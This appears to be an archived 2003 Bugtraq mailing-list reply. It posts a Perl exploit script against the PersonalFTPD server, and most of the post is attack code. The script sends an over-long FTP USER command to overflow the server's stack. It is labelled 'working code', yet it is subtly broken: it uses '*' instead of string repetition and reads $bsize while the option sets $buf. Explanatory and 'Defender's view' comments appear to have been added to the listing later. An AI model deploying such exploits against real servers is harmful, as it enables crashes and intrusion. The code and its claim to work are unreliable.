Re: Remote Stack Overflow exploit for Personal FTPD

From: subj (r2subj3ctat_private)
Date: Thu May 08 2003 - 10:25:53 PDT


    
    In-Reply-To: <20030508081123.13047.qmailat_private>
    
    >Received: (qmail 20952 invoked from network); 8 May 2003 14:15:36 -0000
    >Received: from outgoing2.securityfocus.com (205.206.231.26)
    >  by mail.securityfocus.com with SMTP; 8 May 2003 14:15:36 -0000
    >Received: from lists.securityfocus.com (lists.securityfocus.com 
    [205.206.231.19])
    >	by outgoing2.securityfocus.com (Postfix) with QMQP
    >	id ED2648F2D9; Thu,  8 May 2003 08:19:59 -0600 (MDT)
    >Mailing-List: contact bugtraq-helpat_private; run by ezmlm
    >Precedence: bulk
    >List-Id: <bugtraq.list-id.securityfocus.com>
    >List-Post: <mailto:bugtraqat_private>
    >List-Help: <mailto:bugtraq-helpat_private>
    >List-Unsubscribe: <mailto:bugtraq-unsubscribeat_private>
    >List-Subscribe: <mailto:bugtraq-subscribeat_private>
    >Delivered-To: mailing list bugtraqat_private
    >Delivered-To: moderator for bugtraqat_private
    >Received: (qmail 22205 invoked from network); 8 May 2003 07:49:14 -0000
    >Date: 8 May 2003 08:11:23 -0000
    >Message-ID: <20030508081123.13047.qmailat_private>
    >Content-Type: text/plain
    >Content-Disposition: inline
    >Content-Transfer-Encoding: binary
    >MIME-Version: 1.0
    >X-Mailer: MIME-tools 5.411 (Entity 5.404)
    >From: subj <r2subj3ctat_private>
    >To: bugtraqat_private
    >Subject: Remote Stack Overflow exploit for Personal FTPD
    >
    >
    >
    >#!/usr/bin/perl
    >use IO::Socket;
    >
    >##########################################################
    >#                                                        #
    ># Remote Stack Overflow sploit for PersonalFTPD          #
    ># If wanna talk with me find me on irc                   #
    ># irc.irochka.net #dwc, #global, #phreack                #
    ># ###################################################### #
    ># thanx to kabuto, drG4njubas, fnq                       #
    ># gr33tz to dhg, gipshack, rsteam, blacktigerz           #
    ># D4rkGr3y, r4ShRaY, DethSpirit, J0k3r, Foster, nik0     #
    ># ORB, Moby, 3APA3A, euronymous, L0vCh1Y, d1z            #
    ># ###################################################### #
    ># Vulnerability links:                                   #
    ># http://security.nnov.ru/search/document.asp?docid=4309 #
    ># http://www.securityfocus.com/archive/1/316958          #
    >#                                                        #
    >##########################################################
    >
    >$data = "A";
    >
    >print "[..] ::::::::::::::::::::::::::::::::::::::::::::: [..]\n";
    >print "[..] Remote Stack Overflow sploit for PersonalFTPD [..]\n";
    >print "[..]      by subj | dwc :: big 10x to Kabuto       [..]\n";
    >print "[..]    www.dwcgr0up.com www.dwcgr0up.com/subj/    [..]\n";
    >print "[..] ::::::::::::::::::::::::::::::::::::::::::::: [..]\n\n";
    >
    >$count_param=@ARGV;
    >$n="0";
    >if ($count_param==0) {print "Usage: -h - host, -p - port, -b - buffer 
    >size\n\n"; exit; }
    >while ($n<$count_param) {
    >if ($ARGV[$n] eq "-h") {$server=$ARGV[$n+1];}
    >if ($ARGV[$n] eq "-p") {$port=$ARGV[$n+1];}
    >if ($ARGV[$n] eq "-b") {$buf=$ARGV[$n+1];}
    >$n++;
    >}
    >&connect;
    >
    >sub connect 
    >{
    >$sock = IO::Socket::INET->new(PeerAddr => "$server", PeerPort 
    => "$port", 
    >Proto => "tcp")
    >        || die "Can\'t connect to $server port $port\n";
    >print $sock "USER $buffer\n";
    >print "Buffer has beens sended...";
    >
    >}
    >
    >
    >close($sock);
    >exit;
    >
    --------------------------------------------------------------------------
    My apologies: I posted a non-working version because I picked the wrong 
    file. Before the $sock line it is necessary to add $buffer.= $data * 
    $bsize;
    Working code:
    
    
    #!/usr/bin/perl
    use IO::Socket;
    
    ##########################################################
    #                                                        #
    # Remote Stack Overflow sploit for PersonalFTPD          #
    # If wanna talk with me find me on irc                   #
    # irc.irochka.net #dwc, #global, #phreack                #
    # ###################################################### #
    # thanx to kabuto, drG4njubas, fnq                       #
    # gr33tz to dhg, gipshack, rsteam, blacktigerz           #
    # D4rkGr3y, r4ShRaY, DethSpirit, J0k3r, Foster, nik0     #
    # ORB, Moby, 3APA3A, euronymous, L0vCh1Y, d1z            #
    # ###################################################### #
    # Vulnerability links:                                   #
    # http://security.nnov.ru/search/document.asp?docid=4309 #
    # http://www.securityfocus.com/archive/1/316958          #
    #                                                        #
    ##########################################################
    
    # Single filler character; within this listing $data is read only in
    # sub connect.
    $data = "A";
    
    # Banner, printed on every run before any argument checking.
    print "[..] ::::::::::::::::::::::::::::::::::::::::::::: [..]\n";
    print "[..] Remote Stack Overflow sploit for PersonalFTPD [..]\n";
    print "[..]      by subj | dwc :: big 10x to Kabuto       [..]\n";
    print "[..]    www.dwcgr0up.com www.dwcgr0up.com/subj/    [..]\n";
    print "[..] ::::::::::::::::::::::::::::::::::::::::::::: [..]\n\n";
    
    # Hand-rolled option scan over @ARGV (no strict, no Getopt::Long).
    # $count_param is the number of command-line arguments; $n is the index.
    $count_param=@ARGV;
    $n="0";
    # No arguments at all: print the usage line and stop.
    if ($count_param==0) {print "Usage: -h - host, -p - port, -b - buffer 
    size\n\n"; exit; }
    # For each -h / -p / -b flag, the element that follows it is stored in the
    # package globals $server / $port / $buf. Nothing is validated, and a flag
    # given as the last argument stores undef.
    while ($n<$count_param) {
    if ($ARGV[$n] eq "-h") {$server=$ARGV[$n+1];}
    if ($ARGV[$n] eq "-p") {$port=$ARGV[$n+1];}
    if ($ARGV[$n] eq "-b") {$buf=$ARGV[$n+1];}
    $n++;
    }
    # The & sigil selects the user-defined sub below rather than Perl's
    # built-in connect().
    &connect;
    
    # connect: opens one TCP connection to $server:$port and writes a single
    # FTP "USER <argument>" line to it. Takes no parameters; it reads the
    # package globals $data, $bsize, $server and $port and leaves the socket
    # in the global $sock. No PASS or other command is sent and no server
    # reply is read.
    #
    # Defender's view: the entire request is one USER command whose argument
    # is intended to be over-long (the header describes a stack overflow in
    # PersonalFTPD). A server should bound the length of the USER argument
    # before copying it, and FTP USER lines far longer than any real account
    # name are a reasonable thing to alert on.
    # NOTE(review): this listing was posted as a correction to an earlier
    # non-working copy and has not been verified here.
    sub connect 
    {
    # Prepare the USER argument in $buffer from $data and $bsize.
    $buffer.= $data * $bsize;
    # die with a message if the TCP connection cannot be established.
    $sock = IO::Socket::INET->new(PeerAddr => "$server", PeerPort => "$port", 
    Proto => "tcp")
            || die "Can\'t connect to $server port $port\n";
    # The one and only line written to the server.
    print $sock "USER $buffer\n";
    # Local status message only; it does not reflect any server response.
    print "Buffer has beens sended...";
    
    }
    
    
    # Runs after the &connect call returns: close the global socket handle
    # and end the script.
    close($sock);
    exit;
    


